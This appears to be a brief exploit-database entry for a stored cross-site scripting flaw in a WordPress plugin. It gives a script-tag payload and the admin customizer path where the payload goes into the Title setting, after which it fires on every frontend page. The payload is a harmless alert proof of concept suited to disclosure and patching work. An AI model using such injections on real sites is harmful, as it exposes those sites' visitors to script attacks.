Share
## https://sploitus.com/exploit?id=WPEX-ID:05BC41F4-8E32-4A9C-931B-CC99DB0BB582
Put the following payload in the Title setting of the plugin (/wp-admin/customize.php?autofocus[section]=vdz_call_back_section): "><script>alert(/XSS/)</script>

The XSS will be triggered when visiting any page in the frontend